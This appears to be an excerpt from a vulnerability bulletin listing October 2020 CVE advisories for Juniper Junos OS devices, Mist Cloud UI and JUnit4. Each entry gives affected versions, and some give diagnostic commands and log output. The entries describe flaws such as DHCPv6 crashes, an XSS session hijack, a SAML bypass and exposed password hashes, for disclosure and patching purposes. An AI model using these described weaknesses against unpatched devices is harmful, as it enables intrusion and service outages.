juniper_networks — junos_mx_series_devices	When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process might be bypassed due to a race condition. Due to this vulnerability, mspmand process, responsible for managing “URL Filtering service”, can crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2.	2020-10-16	not yet calculated	CVE-2020-1667 MISC
juniper_networks — junos_os	A stack buffer overflow vulnerability in the device control daemon (DCD) on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service (DoS) against the daemon or execute arbitrary code in the system with root privilege. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2. Versions of Junos OS prior to 17.3 are unaffected by this vulnerability.	2020-10-16	not yet calculated	CVE-2020-1664 CONFIRM
juniper_networks — junos_os	Insufficient Cross-Site Scripting (XSS) protection in Juniper Networks J-Web and web based (HTTP/HTTPS) services allows an unauthenticated attacker to hijack the target user’s HTTP/HTTPS session and perform administrative actions on the Junos device as the targeted user. This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled such as J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP). Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device> show system processes \| match http 5260 – S 0:00.13 /usr/sbin/httpd-gk -N 5797 – I 0:00.10 /usr/sbin/httpd –config /jail/var/etc/httpd.conf In order to successfully exploit this vulnerability, the attacker needs to convince the device administrator to take action such as clicking the crafted URL sent via phishing email or convince the administrator to input data in the browser console. This issue affects Juniper Networks Junos OS: 18.1 versions prior to 18.1R3-S1; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.	2020-10-16	not yet calculated	CVE-2020-1673 CONFIRM
juniper_networks — junos_os	Juniper Networks Junos OS and Junos OS Evolved fail to drop/discard delayed MACsec packets (e.g. delayed by more than 2 seconds). Per the specification, called the “bounded receive delay”, there should be no replies to delayed MACsec packets. Any MACsec traffic delayed more than 2 seconds should be dropped and late drop counters should increment. Without MACsec delay protection, an attacker could exploit the delay to spoof or decrypt packets. This issue affects: Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8, 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved: all versions prior to 19.4R3-EVO; 20.1 versions prior to 20.1R2-EVO. This issue does not affect Junos OS versions prior to 16.1R1.	2020-10-16	not yet calculated	CVE-2020-1674 MISC CONFIRM MISC
juniper_networks — junos_os	On Juniper Networks Junos OS devices configured as a DHCP forwarder, the Juniper Networks Dynamic Host Configuration Protocol Daemon (jdhcp) process might crash when receiving a malformed DHCP packet. This issue only affects devices configured as DHCP forwarder with forward-only option, that forward specified DHCP client packets, without creating a new subscriber session. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of the malformed DHCP packet will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. This issue can be triggered only by DHCPv4, it cannot be triggered by DHCPv6. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D105 on SRX Series; 14.1X53 versions prior to 14.1X53-D60 on EX and QFX Series; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230 on SRX Series; 15.1X53 versions prior to 15.1X53-D593 on EX2300/EX3400; 16.1 versions prior to 16.1R7-S5.	2020-10-16	not yet calculated	CVE-2020-1661 CONFIRM
juniper_networks — junos_os	On Juniper Networks Junos OS devices configured with DHCPv6 relay enabled, receipt of a specific DHCPv6 packet might crash the jdhcpd daemon. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of specific crafted DHCP messages will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. Only DHCPv6 packet can trigger this issue. DHCPv4 packet cannot trigger this issue. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1672 CONFIRM
juniper_networks — junos_os	The DHCPv6 Relay-Agent service, part of the Juniper Enhanced jdhcpd daemon shipped with Juniper Networks Junos OS has an Improper Input Validation vulnerability which will result in a Denial of Service (DoS) condition when a DHCPv6 client sends a specific DHPCv6 message allowing an attacker to potentially perform a Remote Code Execution (RCE) attack on the target device. Continuous receipt of the specific DHCPv6 client message will result in an extended Denial of Service (DoS) condition. If adjacent devices are also configured to relay DHCP packets, and are not affected by this issue and simply transparently forward unprocessed client DHCPv6 messages, then the attack vector can be a Network-based attack, instead of an Adjacent-device attack. No other DHCP services are affected. Receipt of the packet without configuration of the DHCPv6 Relay-Agent service, will not result in exploitability of this issue. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95; 14.1X53 versions prior to 14.1X53-D53; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D44; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2.	2020-10-16	not yet calculated	CVE-2020-1656 CONFIRM MISC MISC MISC
juniper_networks — junos_os	On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash with a core dump if a malformed DHCPv6 packet is received, resulting with the restart of the daemon. This issue only affects DHCPv6, it does not affect DHCPv4. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.2 version 19.2R2 and later versions; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2; This issue does not affect Juniper Networks Junos OS prior to 17.4R1.	2020-10-16	not yet calculated	CVE-2020-1671 CONFIRM
juniper_networks — junos_os_and_junos_os_evolved	On Juniper Networks Junos OS and Junos OS Evolved platforms with EVPN configured, receipt of specific BGP packets causes a slow memory leak. If the memory is exhausted the rpd process might crash. If the issue occurs, the memory leak could be seen by executing the “show task memory detail \| match policy \| match evpn” command multiple times to check if memory (Alloc Blocks value) is increasing. root@device> show task memory detail \| match policy \| match evpn ———————— Allocator Memory Report ———————— Name \| Size \| Alloc DTXP Size \| Alloc Blocks \| Alloc Bytes \| MaxAlloc Blocks \| MaxAlloc Bytes Policy EVPN Params 20 24 3330678 79936272 3330678 79936272 root@device> show task memory detail \| match policy \| match evpn ———————— Allocator Memory Report ———————— Name \| Size \| Alloc DTXP Size \| Alloc Blocks \| Alloc Bytes \| MaxAlloc Blocks \| MaxAlloc Bytes Policy EVPN Params 20 24 36620255 878886120 36620255 878886120 This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R2; 20.1 versions prior to 20.1R1-S4, 20.1R2; Juniper Networks Junos OS Evolved: 19.4 versions; 20.1 versions prior to 20.1R1-S4-EVO, 20.1R2-EVO; 20.2 versions prior to 20.2R1-EVO; This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO.	2020-10-16	not yet calculated	CVE-2020-1678 CONFIRM
juniper_networks — junos_os_and_junos_os_evolved_devices	On Juniper Networks Junos OS and Junos OS Evolved devices, BGP session flapping can lead to a routing process daemon (RPD) crash and restart, limiting the attack surface to configured BGP peers. This issue only affects devices with BGP damping in combination with accepted-prefix-limit configuration. When the issue occurs the following messages will appear in the /var/log/messages: rpd[6046]: %DAEMON-4-BGP_PREFIX_THRESH_EXCEEDED: XXXX (External AS x): Configured maximum accepted prefix-limit threshold(1800) exceeded for inet6-unicast nlri: 1984 (instance master) rpd[6046]: %DAEMON-3-BGP_CEASE_PREFIX_LIMIT_EXCEEDED: 2001:x:x:x::2 (External AS x): Shutting down peer due to exceeding configured maximum accepted prefix-limit(2000) for inet6-unicast nlri: 2001 (instance master) rpd[6046]: %DAEMON-4: bgp_rt_maxprefixes_check_common:9284: NOTIFICATION sent to 2001:x:x:x::2 (External AS x): code 6 (Cease) subcode 1 (Maximum Number of Prefixes Reached) AFI: 2 SAFI: 1 prefix limit 2000 kernel: %KERN-5: mastership_relinquish_on_process_exit: RPD crashed on master RE. Sending SIGUSR2 to chassisd (5612:chassisd) to trigger RE switchover This issue affects: Juniper Networks Junos OS: 17.2R3-S3; 17.3 version 17.3R3-S3 and later versions, prior to 17.3R3-S8; 17.4 version 17.4R2-S4, 17.4R3 and later versions, prior to 17.4R2-S10, 17.4R3-S2; 18.1 version 18.1R3-S6 and later versions, prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions, prior to 18.2R3-S4; 18.2X75 version 18.2X75-D50, 18.2X75-D60 and later versions, prior to 18.2X75-D53, 18.2X75-D65; 18.3 version 18.3R2 and later versions, prior to 18.3R2-S4, 18.3R3-S2; 18.4 version 18.4R2 and later versions, prior to 18.4R2-S5, 18.4R3-S2; 19.1 version 19.1R1 and later versions, prior to 19.1R2-S2, 19.1R3-S1; 19.2 version 19.2R1 and later versions, prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved prior to 20.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R3-S3.	2020-10-16	not yet calculated	CVE-2020-1662 CONFIRM
juniper_networks — junos_os_devices	On Juniper Networks Junos OS devices, receipt of a malformed IPv6 packet may cause the system to crash and restart (vmcore). This issue can be trigged by a malformed IPv6 packet destined to the Routing Engine or a transit packet that is sampled using sFlow/jFlow or processed by firewall filter with the syslog and/or log action. An attacker can repeatedly send the offending packet resulting in an extended Denial of Service condition. Only IPv6 packets can trigger this issue. IPv4 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 18.4R1.	2020-10-16	not yet calculated	CVE-2020-1686 CONFIRM
juniper_networks — junos_os_devices	On Juniper Networks Junos OS devices, a specific SNMP OID poll causes a memory leak which over time leads to a kernel crash (vmcore). Prior to the kernel crash other processes might be impacted, such as failure to establish SSH connection to the device. The administrator can monitor the output of the following command to check if there is memory leak caused by this issue: user@device> show system virtual-memory \| match “pfe_ipc\|kmem” pfe_ipc 147 5K – 164352 16,32,64,8192 <– increasing vm.kmem_map_free: 127246336 <– decreasing pfe_ipc 0 0K – 18598 32,8192 vm.kmem_map_free: 134582272 This issue affects Juniper Networks Junos OS: 17.4R3; 18.1 version 18.1R3-S5 and later versions prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions prior to 18.2R3-S3; 18.2X75 version 18.2X75-D420, 18.2X75-D50 and later versions prior to 18.2X75-D430, 18.2X75-D53, 18.2X75-D60; 18.3 version 18.3R3 and later versions prior to 18.3R3-S2; 18.4 version 18.4R1-S4, 18.4R2 and later versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 version 19.1R2 and later versions prior to 19.1R2-S2, 19.1R3; 19.2 version 19.2R1 and later versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 17.4R3.	2020-10-16	not yet calculated	CVE-2020-1683 CONFIRM
juniper_networks — junos_os_evolved	The system console configuration option ‘log-out-on-disconnect’ In Juniper Networks Junos OS Evolved fails to log out an active CLI session when the console cable is disconnected. This could allow a malicious attacker with physical access to the console the ability to resume a previous interactive session and possibly gain administrative privileges. This issue affects all Juniper Networks Junos OS Evolved versions after 18.4R1-EVO, prior to 20.2R1-EVO.	2020-10-16	not yet calculated	CVE-2020-1666 CONFIRM
juniper_networks — junos_os_evolved	Receipt of a specifically malformed NDP packet sent from the local area network (LAN) to a device running Juniper Networks Junos OS Evolved can cause the ndp process to crash, resulting in a Denial of Service (DoS). The process automatically restarts without intervention, but a continuous receipt of the malformed NDP packets could leaded to an extended Denial of Service condition. During this time, IPv6 neighbor learning will be affected. The issue occurs when parsing the incoming malformed NDP packet. Rather than simply discarding the packet, the process asserts, performing a controlled exit and restart, thereby avoiding any chance of an unhandled exception. Exploitation of this vulnerability is limited to a temporary denial of service, and cannot be leveraged to cause additional impact on the system. This issue is limited to the processing of IPv6 NDP packets. IPv4 packet processing cannot trigger, and is unaffected by this vulnerability. This issue affects all Juniper Networks Junos OS Evolved versions prior to 20.1R2-EVO. Junos OS is unaffected by this vulnerability.	2020-10-16	not yet calculated	CVE-2020-1681 CONFIRM
juniper_networks — mist_cloud_ui	When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.	2020-10-16	not yet calculated	CVE-2020-1676 CONFIRM
juniper_networks — multiple_junos_os_devices	On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in (Ethernet VPN) EVPN-(Virtual Extensible LAN) VXLAN configuration, receipt of a stream of specific VXLAN encapsulated layer 2 frames can cause high CPU load, which could lead to network protocol operation issue and traffic interruption. This issue affects devices that are configured as a Layer 2 or Layer 3 gateway of an EVPN-VXLAN deployment. The offending layer 2 frames that cause the issue originate from a different access switch that get encapsulated within the same EVPN-VXLAN domain. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1687 CONFIRM
juniper_networks — multiple_junos_os_devices	On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in a Virtual Chassis configuration, receipt of a stream of specific layer 2 frames can cause high CPU load, which could lead to traffic interruption. This issue does not occur when the device is deployed in Stand Alone configuration. The offending layer 2 frame packets can originate only from within the broadcast domain where the device is connected. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1689 CONFIRM
juniper_networks — multiple_junos_os_devices	An input validation vulnerability exists in Juniper Networks Junos OS, allowing an attacker to crash the srxpfe process, causing a Denial of Service (DoS) through the use of specific maintenance commands. The srxpfe process restarts automatically, but continuous execution of the commands could lead to an extended Denial of Service condition. This issue only affects the SRX1500, SRX4100, SRX4200, NFX150, and vSRX-based platforms. No other products or platforms are affected by this vulnerability. This issue affects the following versions of Juniper Networks Junos OS on SRX1500, SRX4100, SRX4200, vSRX, NFX150: 15.1X49 versions prior to 15.1X49-D220; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3. This issue does not affect Junos OS 19.3 or any subsequent version.	2020-10-16	not yet calculated	CVE-2020-1682 CONFIRM
juniper_networks — mx_series_and_ex9200_series_devices	On Juniper Networks MX Series and EX9200 Series, in a certain condition the IPv6 Distributed Denial of Service (DDoS) protection might not take affect when it reaches the threshold condition. The DDoS protection allows the device to continue to function while it is under DDoS attack, protecting both the Routing Engine (RE) and the Flexible PIC Concentrator (FPC) during the DDoS attack. When this issue occurs, the RE and/or the FPC can become overwhelmed, which could disrupt network protocol operations and/or interrupt traffic. This issue does not affect IPv4 DDoS protection. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX series and EX9200 Series: 17.2 versions prior to 17.2R3-S4; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.2 versions prior to 18.2R2-S7, 18.2R3, 18.2R3-S3; 18.2X75 versions prior to 18.2X75-D30; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2.	2020-10-16	not yet calculated	CVE-2020-1665 CONFIRM MISC
juniper_networks — mx_series_devices	On Juniper Networks MX Series with MS-MIC or MS-MPC card configured with NAT64 configuration, receipt of a malformed IPv6 packet may crash the MS-PIC component on MS-MIC or MS-MPC. This issue occurs when a multiservice card is translating the malformed IPv6 packet to IPv4 packet. An unauthenticated attacker can continuously send crafted IPv6 packets through the device causing repetitive MS-PIC process crashes, resulting in an extended Denial of Service condition. This issue affects Juniper Networks Junos OS on MX Series: 15.1 versions prior to 15.1R7-S7; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D430, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2.	2020-10-16	not yet calculated	CVE-2020-1680 CONFIRM
juniper_networks — mx_series_devices	When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing “URL Filtering service”, may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This vulnerability might allow an attacker to cause an extended Denial of Service (DoS) attack against the device and to cause clients to be vulnerable to DNS based attacks by malicious DNS servers when they send DNS requests through the device. As a result, devices which were once protected by the DNS Filtering service are no longer protected and at risk of exploitation. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2.	2020-10-16	not yet calculated	CVE-2020-1660 CONFIRM
juniper_networks — nfx350_devices	The Juniper Device Manager (JDM) container, used by the disaggregated Junos OS architecture on Juniper Networks NFX350 Series devices, stores password hashes in the world-readable file /etc/passwd. This is not a security best current practice as it can allow an attacker with access to the local filesystem the ability to brute-force decrypt password hashes stored on the system. This issue affects Juniper Networks Junos OS on NFX350: 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1669 CONFIRM
juniper_networks — ptx/qfx_series_devices	On Juniper Networks PTX and QFX Series devices with packet sampling configured using tunnel-observation mpls-over-udp, sampling of a malformed packet can cause the Kernel Routing Table (KRT) queue to become stuck. KRT is the module within the Routing Process Daemon (RPD) that synchronized the routing tables with the forwarding tables in the kernel. This table is then synchronized to the Packet Forwarding Engine (PFE) via the KRT queue. Thus, when KRT queue become stuck, it can lead to unexpected packet forwarding issues. An administrator can monitor the following command to check if there is the KRT queue is stuck: user@device > show krt state … Number of async queue entries: 65007 <— this value keep on increasing. When this issue occurs, the following message might appear in the /var/log/messages: DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Too many delayed route/nexthop unrefs. Op 2 err 55, rtsm_id 5:-1, msg type 2 DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Memory usage of M_RTNEXTHOP type = (0) Max size possible for M_RTNEXTHOP type = (7297134592) Current delayed unref = (60000), Current unique delayed unref = (18420), Max delayed unref on this platform = (40000) Current delayed weight unref = (60000) Max delayed weight unref on this platform= (400000) curproc = rpd This issue affects Juniper Networks Junos OS on PTX/QFX Series: 17.2X75 versions prior to 17.2X75-D105; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.2X75 versions prior to 18.2X75-D420, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.	2020-10-16	not yet calculated	CVE-2020-1679 CONFIRM
juniper_networks — srx_series_and_nfx_series_devices	On Juniper Networks SRX Series and NFX Series, a local authenticated user with access to the shell may obtain the Web API service private key that is used to provide encrypted communication between the Juniper device and the authenticator services. Exploitation of this vulnerability may allow an attacker to decrypt the communications between the Juniper device and the authenticator service. This Web API service is used for authentication services such as the Juniper Identity Management Service, used to obtain user identity for Integrated User Firewall feature, or the integrated ClearPass authentication and enforcement feature. This issue affects Juniper Networks Junos OS on Networks SRX Series and NFX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D190; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S4, 19.2R2.	2020-10-16	not yet calculated	CVE-2020-1688 MISC CONFIRM MISC MISC MISC
juniper_networks — srx_series_devices	On SRX Series devices, a vulnerability in the key-management-daemon (kmd) daemon of Juniper Networks Junos OS allows an attacker to spoof packets targeted to IPSec peers before a security association (SA) is established thereby causing a failure to set up the IPSec channel. Sustained receipt of these spoofed packets can cause a sustained Denial of Service (DoS) condition. This issue affects IPv4 and IPv6 implementations. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D90; 15.1X49 versions prior to 15.1X49-D190; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S6, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2. This issue does not affect 12.3 or 15.1 releases which are non-SRX Series releases.	2020-10-16	not yet calculated	CVE-2020-1657 CONFIRM
juniper_networks — srx_series_devices	On Juniper Networks SRX Series configured with application identification inspection enabled, receipt of specific HTTP traffic can cause high CPU load utilization, which could lead to traffic interruption. Application identification is enabled by default and is automatically turned on when Intrusion Detection and Prevention (IDP), AppFW, AppQoS, or AppTrack is configured. Thus, this issue might occur when IDP, AppFW, AppQoS, or AppTrack is configured. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2.	2020-10-16	not yet calculated	CVE-2020-1684 CONFIRM
junit — junit4	In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder contains a local information disclosure vulnerability. On Unix like systems, the system’s temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. This vulnerability impacts you if the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder, and the JUnit tests execute in an environment where the OS has other untrusted users. Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. For Java 1.7 and higher users: this vulnerability is fixed in 4.13.1. For Java 1.6 and lower users: no patch is available, you must use the workaround below. If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. For more information, including an example of vulnerable code, see the referenced GitHub Security Advisory.	2020-10-12	not yet calculated	CVE-2020-15250 MISC MISC MISC CONFIRM MISC MLIST 